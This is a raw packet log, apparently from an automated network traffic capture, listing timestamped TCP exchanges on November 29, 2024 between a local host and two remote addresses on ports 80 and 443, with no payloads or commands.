                                                                                                                                                                                    Nov 29, 2024 19:49:35.218064070 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.218089104 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.218816042 CET49756443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:35.218847036 CET4434975613.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.219384909 CET49756443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:35.219392061 CET4434975613.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.219495058 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.219532967 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.219821930 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.221122026 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.221162081 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.221194983 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.268143892 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.319427967 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.319909096 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.319921017 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.319987059 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.321006060 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.321049929 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.321228027 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.322272062 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.322314024 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.322508097 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.323512077 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.323560953 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.323633909 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.324800014 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.324848890 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.324866056 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.326050997 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.326098919 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.326162100 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.327353954 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.327366114 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.327423096 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.328486919 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.328533888 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.328563929 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.329735994 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.329781055 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.329802990 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.330950975 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.331007004 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.331011057 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.332304001 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.332356930 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.332458019 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.333559036 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.333609104 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.333686113 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.334533930 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.334584951 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.334640026 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.335695982 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.335742950 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.335819006 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.336874962 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.336916924 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.336990118 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.337997913 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.338046074 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.338083029 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.339159966 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.339205980 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.339310884 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.340322971 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.340369940 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.340477943 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.341500998 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.341512918 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.341555119 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.342504025 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.342552900 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.342679977 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.343676090 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.343724012 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.343875885 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.344784021 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.344829082 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.345114946 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.345923901 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.345966101 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.345982075 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.347073078 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.347124100 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.347151995 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.348066092 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.348110914 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.348143101 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.349167109 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.349212885 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.349271059 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.350311041 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.350353003 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.350373983 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.351347923 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.351396084 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.351475954 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.352487087 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.352566004 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.352658987 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.353626013 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.353677988 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.353710890 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.354718924 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.354788065 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.354895115 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.355811119 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.355859041 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.355926991 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.356944084 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.356993914 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.357171059 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.358007908 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.358062029 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.358201027 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.359229088 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.359241009 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.359288931 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.360208035 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.360258102 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.360538006 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.361440897 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.361494064 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.361723900 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.362427950 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.362479925 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.362577915 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.363507032 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.363559008 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.363661051 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.364629984 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.364671946 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.364677906 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.365717888 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.365761995 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.365921974 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.366887093 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.366935968 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.366940022 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.367928028 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.367971897 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.368000031 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.369064093 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.369111061 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.369136095 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.370137930 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.370183945 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.370203972 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.371356010 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.371402025 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.371417046 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.372344971 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.372391939 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.372447014 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.373452902 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.373495102 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.373501062 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.374564886 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.374617100 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.374691010 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.375658035 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.375705004 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.375749111 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.424427986 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.463887930 CET4434975713.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.464492083 CET49757443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:35.464512110 CET4434975713.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.464977026 CET49757443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:35.464982986 CET4434975713.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.486926079 CET4434975813.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.487363100 CET49758443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:35.487406969 CET4434975813.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.487704992 CET49758443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:35.487720013 CET4434975813.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.521174908 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.521193981 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.521260977 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.521696091 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.521866083 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.521914005 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.522735119 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.522924900 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.522970915 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.523861885 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.524116039 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.524163008 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.525000095 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.525044918 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.525090933 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.525979996 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.526124001 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.526170969 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.527115107 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.527127028 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.527169943 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.528259039 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.528338909 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.528386116 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.529284000 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.529357910 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.529401064 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.530352116 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.530539036 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.530591965 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.531449080 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.531531096 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.531579971 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.532548904 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.532656908 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.532702923 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.533615112 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.533755064 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.533809900 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.534682035 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.534763098 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.534825087 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.535850048 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.535892010 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.535932064 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.536849976 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.536967993 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.537015915 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.537967920 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.538135052 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.538178921 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.539017916 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.539124966 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.539191961 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.540146112 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.540216923 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.540260077 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.541259050 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.541392088 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.541435003 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.542330980 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.542380095 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.542412043 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.543353081 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.543443918 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.543520927 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.544440031 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.544572115 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.544610977 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.545545101 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.545875072 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.545923948 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.546605110 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.546739101 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.546778917 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.547696114 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.547868013 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.547904015 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.548829079 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.549010038 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.549062967 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.549926043 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.550008059 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.550051928 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.550981045 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.551105976 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.551146030 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.552077055 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.552160978 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.552202940 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.553128958 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.553224087 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.553267956 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.554377079 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.554455996 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.554505110 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.555342913 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.555423021 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.555469036 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.556400061 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.556664944 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.556711912 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.557475090 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.557698965 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.557744980 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.558624983 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.558692932 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.558736086 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.559672117 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.559825897 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.559869051 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:35.560755968 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:35.560919046 CET8049755185.215.113.16192.168.2.6
